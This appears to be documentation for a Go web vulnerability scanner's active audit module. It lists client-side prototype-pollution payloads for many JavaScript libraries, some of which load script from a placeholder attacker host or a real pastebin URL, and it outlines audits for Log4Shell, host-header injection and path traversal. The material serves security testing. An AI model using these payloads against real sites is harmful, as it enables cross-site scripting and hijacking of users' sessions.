Index ¶
- Variables
- func ForbiddenBypassScan(history *db.History, options ActiveModuleOptions)
- func JSONPCallbackScan(history *db.History, options ActiveModuleOptions)
- func OpenRedirectScan(history *db.History, options ActiveModuleOptions, ...) (bool, error)
- func ScanHistoryItem(item *db.History, interactionsManager *integrations.InteractionsManager, ...)
- type ActiveModuleOptions
- type AlertAudit
- type ClientSidePrototypePollutionAudit
- type HTTPMethodsAudit
- type HeaderTest
- type HostHeaderInjectionAudit
- type HttpVersionScanResults
- type KnownGadget
- type Log4ShellInjectionAudit
- type PathTraversalAudit
- type SNIAudit
- type XSSAudit
- func (x *XSSAudit) GetHistory(url string) *db.History
- func (x *XSSAudit) IsDetectedLocation(url, parameter string) bool
- func (x *XSSAudit) Run(targetUrl string, params []string, wordlistPath string, urlEncode bool)
- func (x *XSSAudit) StoreDetectedLocation(url, parameter string)
- func (x *XSSAudit) TestUrlParamWithAlertPayload(item lib.ParameterAuditItem, b *rod.Browser) error
Variables ¶
// GadgetsMap maps the name of a known client-side library, SDK or tag to the
// prototype-pollution gadget probes used to detect it. Each payload is a
// query-string fragment that writes a property onto Object.prototype through
// __proto__ (or constructor[prototype] / constructor.prototype for parsers
// that block the __proto__ key); Info is free-form text about the entry and
// is empty for most of them.
//
// NOTE(review): nearly every URL escape is written with a doubled percent
// (%%20, %%3d, %%23), which suggests the payloads pass through a printf-style
// formatter before being sent — confirm against the consumer in
// ClientSidePrototypePollutionAudit. Hosts named attacker.tld are placeholders
// and presumably substituted by that consumer; verify.
var GadgetsMap = map[string]KnownGadget{
	"Adobe Dynamic Tag Management": {
		Payloads: []string{
			"__proto__[src]=data:,alert(1)//",
		},
		Info: "",
	},
	"Akamai Boomerang": {
		Payloads: []string{
			"__proto__[BOOMR]=1&__proto__[url]=//attacker.tld/js.js",
		},
		Info: "",
	},
	"Closure": {
		Payloads: []string{
			"__proto__[*%%20ONERROR]=1&__proto__[*%%20SRC]=1",
			"__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//",
		},
		Info: "",
	},
	"DOMPurify": {
		Payloads: []string{
			"__proto__[ALLOWED_ATTR][0]=onerror&__proto__[ALLOWED_ATTR][1]=src",
			"__proto__[documentMode]=9",
		},
		Info: "",
	},
	"Embedly": {
		Payloads: []string{
			"__proto__[onload]=alert(1)",
		},
		Info: "",
	},
	"jQuery": {
		Payloads: []string{
			"__proto__[context]=<img/src/onerror%%3dalert(1)>&__proto__[jquery]=x",
			"__proto__[url][]=data:,alert(1)//&__proto__[dataType]=script",
			"__proto__[url]=data:,alert(1)//&__proto__[dataType]=script&__proto__[crossDomain]=",
			"__proto__[src][]=data:,alert(1)//",
			"__proto__[url]=data:,alert(1)//",
			"__proto__[div][0]=1&__proto__[div][1]=<img/src/onerror%%3dalert(1)>&__proto__[div][2]=1",
			"__proto__[preventDefault]=x&__proto__[handleObj]=x&__proto__[delegateTarget]=<img/src/onerror%%3dalert(1)>",
		},
		Info: "",
	},
	"js-xss": {
		Payloads: []string{
			"__proto__[location]=https://attacker.tld/",
		},
		Info: "",
	},
	"Knockout.js": {
		Payloads: []string{
			"__proto__[4]=a':1,[alert(1)]:1,'b&__proto__[5]=",
		},
		Info: "",
	},
	"Lodash <= 4.17.15": {
		Payloads: []string{
			// NOTE(review): "%A8" is the only single-percent escape in this map
			// while its neighbours are doubled ("%%E2", "%%80", "%%A9"). If the
			// payloads are formatted before use, "%A" will be consumed as a verb
			// and the U+2028 line separator this gadget relies on will be lost —
			// confirm whether "%%A8" was intended.
			"__proto__[sourceURL]=%%E2%%80%A8%%E2%%80%%A9alert(1)",
		},
		Info: "",
	},
	"Marionette.js / Backbone.js": {
		Payloads: []string{
			"__proto__[tagName]=img&__proto__[src][]=x:&__proto__[onerror][]=alert(1)",
		},
		Info: "",
	},
	"Google reCAPTCHA": {
		Payloads: []string{
			"__proto__[srcdoc][]=<script>alert(1)</script>",
		},
		Info: "",
	},
	"sanitize-html": {
		Payloads: []string{
			"__proto__[*][]=onload",
			"__proto__[innerText]=<script>alert(1)</script>",
		},
		Info: "Displaying all possible payloads",
	},
	"Segment Analytics.js": {
		Payloads: []string{
			"__proto__[script][0]=1&__proto__[script][1]=<img/src/onerror%%3dalert(1)>&__proto__[script][2]=1",
		},
		Info: "",
	},
	"Sprint.js": {
		Payloads: []string{
			"__proto__[div][intro]=<img%%20src%%20onerror%%3dalert(1)>",
		},
		Info: "",
	},
	"Swiftype Site Search": {
		Payloads: []string{
			"__proto__[xxx]=alert(1)",
		},
		Info: "",
	},
	"Tealium Universal Tag": {
		Payloads: []string{
			"__proto__[attrs][src]=1&__proto__[src]=//attacker.tld/js.js",
		},
		Info: "",
	},
	"Twitter Universal Website Tag": {
		Payloads: []string{
			"__proto__[attrs][src]=1&__proto__[hif][]=javascript:alert(1)",
		},
		Info: "",
	},
	"Wistia Embedded Video": {
		Payloads: []string{
			// Unlike the other onerror payloads this one uses a literal "=" rather
			// than "%%3d"; presumably deliberate, but worth a check if this entry
			// never fires.
			"__proto__[innerHTML]=<img/src/onerror=alert(1)>",
		},
		Info: "",
	},
	"Zepto.js": {
		Payloads: []string{
			"__proto__[onerror]=alert(1)",
		},
		Info: "",
	},
	"Vue.js": {
		Payloads: []string{
			"__proto__[v-if]=_c.constructor('alert(1)')()",
			"__proto__[attrs][0][name]=src&__proto__[attrs][0][value]=xxx&__proto__[xxx]=data:,alert(1)//&__proto__[is]=script",
			"__proto__[v-bind:class]=''.constructor.constructor('alert(1)')()",
			"__proto__[data]=a&__proto__[template][nodeType]=a&__proto__[template][innerHTML]=<script>alert(1)</script>",
			// Raw string: the payload itself contains double quotes.
			`__proto__[props][][value]=a&__proto__[name]=":''.constructor.constructor('alert(1)')(),""`,
			"__proto__[template]=<script>alert(1)</script>",
		},
		Info: "Displaying all possible payloads",
	},
	"Popper.js": {
		Payloads: []string{
			"__proto__[arrow][style]=color:red;transition:all%%201s&__proto__[arrow][ontransitionend]=alert(1)",
			"__proto__[reference][style]=color:red;transition:all%%201s&__proto__[reference][ontransitionend]=alert(2)",
			"__proto__[popper][style]=color:red;transition:all%%201s&__proto__[popper][ontransitionend]=alert(3)",
		},
		Info: "Displaying all possible payloads",
	},
	"Pendo Agent": {
		Payloads: []string{
			"__proto__[dataHost]=attacker.tld/js.js%%23",
		},
		Info: "",
	},
	"i18next": {
		Payloads: []string{
			"__proto__[lng]=cimode&__proto__[appendNamespaceToCIMode]=x&__proto__[nsSeparator]=<img/src/onerror%%3dalert(1)>",
			"__proto__[lng]=a&__proto__[a]=b&__proto__[obj]=c&__proto__[k]=d&__proto__[d]=<img/src/onerror%%3dalert(1)>",
			"__proto__[lng]=a&__proto__[key]=<img/src/onerror%%3dalert(1)>",
		},
		Info: "Displaying all possible payloads",
	},
	"Demandbase Tag": {
		Payloads: []string{
			"__proto__[Config][SiteOptimization][enabled]=1&__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?",
		},
		Info: "",
	},
	"Google Tag Manager plugin for analytics": {
		Payloads: []string{
			"__proto__[customScriptSrc]=//attacker.tld/xss.js",
		},
		Info: "",
	},
	"CanJS deparam": {
		Payloads: []string{
			"__proto__[test]=test",
			"?constructor[prototype][test]=test",
		},
		Info: "Displaying all possible payloads",
	},
	"jQuery parseParams": {
		Payloads: []string{
			"__proto__.test=test",
			"?constructor.prototype.test=test",
		},
		Info: "",
	},
	"MooTools More": {
		Payloads: []string{
			"__proto__[test]=test",
			"?constructor[prototype][test]=test",
		},
		Info: "",
	},
	"Mutiny": {
		Payloads: []string{
			"__proto__.test=test",
		},
		Info: "",
	},
	"AMP": {
		Payloads: []string{
			// NOTE(review): the only payload that points at a real third-party
			// host rather than the attacker.tld placeholder. The content behind
			// that URL is not controlled by this project and can change or
			// disappear, so the probe's behaviour is not reproducible; prefer a
			// self-hosted or placeholder URL.
			"__proto__.ampUrlPrefix=https://pastebin.com/raw/E9f7BSwb",
		},
		Info: "There might be a possible RCE vulnerability.",
	},
}
Functions ¶
func ForbiddenBypassScan ¶
func ForbiddenBypassScan(history *db.History, options ActiveModuleOptions)
func JSONPCallbackScan ¶
func JSONPCallbackScan(history *db.History, options ActiveModuleOptions)
func OpenRedirectScan ¶
func OpenRedirectScan(history *db.History, options ActiveModuleOptions, insertionPoints []scan.InsertionPoint) (bool, error)
func ScanHistoryItem ¶
func ScanHistoryItem(item *db.History, interactionsManager *integrations.InteractionsManager, payloadGenerators []*generation.PayloadGenerator, options scan_options.HistoryItemScanOptions)
Types ¶
type ActiveModuleOptions ¶
type AlertAudit ¶
// AlertAudit configures the alert-based audit driven by Run (wordlist on disk)
// and RunWithPayloads (in-memory payloads).
type AlertAudit struct {
	// Identifiers of the workspace, task and task job the audit belongs to;
	// presumably attached to any finding it records — verify in Run.
	WorkspaceID uint
	TaskID      uint
	TaskJobID   uint
	// SkipInitialAlertValidation presumably bypasses an up-front check that the
	// target does not already raise an alert before any payload is sent; the
	// exact check is not visible here — confirm in Run.
	SkipInitialAlertValidation bool
	// contains filtered or unexported fields
}
func (*AlertAudit) GetHistory ¶
func (x *AlertAudit) GetHistory(id string) *db.History
func (*AlertAudit) Run ¶
func (x *AlertAudit) Run(history *db.History, insertionPoints []scan.InsertionPoint, wordlistPath string, issueCode db.IssueCode)
Run runs the audit using the given filesystem path to a wordlist
func (*AlertAudit) RunWithPayloads ¶
func (x *AlertAudit) RunWithPayloads(history *db.History, insertionPoints []scan.InsertionPoint, payloads []payloads.PayloadInterface, issueCode db.IssueCode)
RunWithPayloads runs the audit using the given payloads
type ClientSidePrototypePollutionAudit ¶
// ClientSidePrototypePollutionAudit configures the audit started by Run, which
// is the intended consumer of the GadgetsMap probes (assumption based on the
// type name; confirm in Run).
type ClientSidePrototypePollutionAudit struct {
	// HistoryItem is the recorded request/response the audit is run against.
	HistoryItem *db.History
	// Identifiers of the workspace, task and task job the audit belongs to.
	WorkspaceID uint
	TaskID      uint
	TaskJobID   uint
	// contains filtered or unexported fields
}
func (*ClientSidePrototypePollutionAudit) GetHistory ¶
func (a *ClientSidePrototypePollutionAudit) GetHistory(url string) *db.History
func (*ClientSidePrototypePollutionAudit) Run ¶
func (a *ClientSidePrototypePollutionAudit) Run()
type HTTPMethodsAudit ¶
// HTTPMethodsAudit configures the HTTP-method audit; the methods it tries are
// produced by GetMethodsToTest.
type HTTPMethodsAudit struct {
	// HistoryItem is the recorded request/response the audit is run against.
	HistoryItem *db.History
	// Concurrency bounds how many requests are in flight at once (name-based;
	// the worker loop is not shown here).
	Concurrency int
	// Identifiers of the workspace, task and task job the audit belongs to.
	WorkspaceID uint
	TaskID      uint
	TaskJobID   uint
}
HTTPMethodsAudit configuration
func (*HTTPMethodsAudit) GetMethodsToTest ¶
func (a *HTTPMethodsAudit) GetMethodsToTest() (headers []string)
type HeaderTest ¶
type HostHeaderInjectionAudit ¶
// HostHeaderInjectionAudit configures the Host-header injection audit started
// by Run. The header set it sends is GetDefaultHeadersToTest plus
// ExtraHeadersToTest, merged by GetHeadersToTest.
type HostHeaderInjectionAudit struct {
	// URL is the target the injected requests are sent to.
	URL string
	// Concurrency bounds how many requests are in flight at once (name-based;
	// the worker loop is not shown here).
	Concurrency int
	// HeuristicRecords and ExpectedResponses come from the fuzz package and
	// presumably hold the baseline the injected responses are compared
	// against — confirm in Run.
	HeuristicRecords  []fuzz.HeuristicRecord
	ExpectedResponses fuzz.ExpectedResponses
	// ExtraHeadersToTest is appended to the default header list by
	// GetHeadersToTest.
	ExtraHeadersToTest []string
	// Identifiers of the workspace, task and task job the audit belongs to.
	WorkspaceID uint
	TaskID      uint
	TaskJobID   uint
}
HostHeaderInjectionAudit configuration
func (*HostHeaderInjectionAudit) GetDefaultHeadersToTest ¶
func (a *HostHeaderInjectionAudit) GetDefaultHeadersToTest() (headers []string)
GetDefaultHeadersToTest returns the default headers that are tested in this audit
func (*HostHeaderInjectionAudit) GetHeadersToTest ¶
func (a *HostHeaderInjectionAudit) GetHeadersToTest() (headers []string)
GetHeadersToTest merges the default headers to test with the provided ExtraHeadersToTest
func (*HostHeaderInjectionAudit) Run ¶
func (a *HostHeaderInjectionAudit) Run()
Run starts the audit
type HttpVersionScanResults ¶
func HttpVersionsScan ¶
func HttpVersionsScan(history *db.History, options ActiveModuleOptions) (HttpVersionScanResults, error)
type KnownGadget ¶
type Log4ShellInjectionAudit ¶
// Log4ShellInjectionAudit configures the Log4Shell header-injection audit. The
// header set it sends is GetDefaultHeadersToTest plus ExtraHeadersToTest,
// merged by GetHeadersToTest.
type Log4ShellInjectionAudit struct {
	// URL is the target the injected requests are sent to.
	URL string
	// Concurrency bounds how many requests are in flight at once (name-based;
	// the worker loop is not shown here).
	Concurrency int
	// HeuristicRecords and ExpectedResponses come from the fuzz package and
	// presumably hold the baseline the injected responses are compared
	// against — confirm in the run logic.
	HeuristicRecords  []fuzz.HeuristicRecord
	ExpectedResponses fuzz.ExpectedResponses
	// ExtraHeadersToTest is appended to the default header list by
	// GetHeadersToTest.
	ExtraHeadersToTest []string
	// InteractionsManager presumably provides the out-of-band callback
	// endpoint the injected lookups point at and reports any interaction it
	// receives; the detection path is not visible here — confirm.
	InteractionsManager *integrations.InteractionsManager
	// Identifiers of the workspace, task and task job the audit belongs to.
	WorkspaceID uint
	TaskID      uint
	TaskJobID   uint
	// Mode is the scan mode from scan_options; its effect on this audit is not
	// shown here.
	Mode scan_options.ScanMode
}
Log4ShellInjectionAudit configuration
func (*Log4ShellInjectionAudit) GetDefaultHeadersToTest ¶
func (a *Log4ShellInjectionAudit) GetDefaultHeadersToTest() (headers []string)
GetDefaultHeadersToTest returns the default headers that are tested in this audit
func (*Log4ShellInjectionAudit) GetHeadersToTest ¶
func (a *Log4ShellInjectionAudit) GetHeadersToTest() (headers []string)
GetHeadersToTest merges the default headers to test and the provided ExtraHeadersToTest
type PathTraversalAudit ¶
// PathTraversalAudit configures the path-traversal audit; each fuzz result is
// classified by ProcessResult.
type PathTraversalAudit struct {
	// URL is the target the traversal payloads are sent to.
	URL string
	// Concurrency bounds how many requests are in flight at once (name-based;
	// the worker loop is not shown here).
	Concurrency int
	// Params lists the parameters to inject into.
	Params []string
	// PayloadsDepth presumably caps how many "../" levels the generated
	// payloads climb; generation is not shown here — confirm.
	PayloadsDepth int
	// Platform presumably selects platform-specific target files and
	// separators (e.g. Windows vs Unix); values are not visible here — confirm.
	Platform string
	// StopAfterSuccess presumably ends the audit at the first positive result
	// (name-based; confirm in the run logic).
	StopAfterSuccess bool
	// OnlyCommonVulnerableParams presumably restricts injection to a built-in
	// list of commonly vulnerable parameter names; that list is not shown here.
	OnlyCommonVulnerableParams bool
	// HeuristicRecords and ExpectedResponses come from the fuzz package and
	// presumably hold the baseline ProcessResult compares each result against
	// — confirm in ProcessResult.
	HeuristicRecords  []fuzz.HeuristicRecord
	ExpectedResponses fuzz.ExpectedResponses
}
PathTraversalAudit configuration
func (*PathTraversalAudit) ProcessResult ¶
func (a *PathTraversalAudit) ProcessResult(result *fuzz.FuzzResult)
ProcessResult processes a result to verify whether it is vulnerable; this logic could be extracted into a differential analysis function
type SNIAudit ¶
// SNIAudit configures the SNI audit. Its run method is not listed on this page.
type SNIAudit struct {
	// HistoryItem is the recorded request/response the audit is run against.
	HistoryItem *db.History
	// InteractionsManager presumably provides an out-of-band callback endpoint
	// for detecting server-side lookups triggered by the SNI value; the
	// detection path is not visible here — confirm.
	InteractionsManager *integrations.InteractionsManager
	// Identifiers of the workspace, task and task job the audit belongs to.
	WorkspaceID uint
	TaskID      uint
	TaskJobID   uint
}
SNIAudit configuration
type XSSAudit ¶
// XSSAudit configures the browser-driven XSS audit (Run,
// TestUrlParamWithAlertPayload). The unexported fields elided below presumably
// back IsDetectedLocation / StoreDetectedLocation, which track URL+parameter
// pairs already confirmed so they are not re-tested — confirm in those methods.
type XSSAudit struct {
	// Identifiers of the workspace, task and task job the audit belongs to.
	WorkspaceID uint
	TaskID      uint
	TaskJobID   uint
	// contains filtered or unexported fields
}
func (*XSSAudit) IsDetectedLocation ¶
func (*XSSAudit) StoreDetectedLocation ¶
func (*XSSAudit) TestUrlParamWithAlertPayload ¶
TestUrlParamWithAlertPayload opens a browser, sends a payload to a parameter and checks whether an alert has opened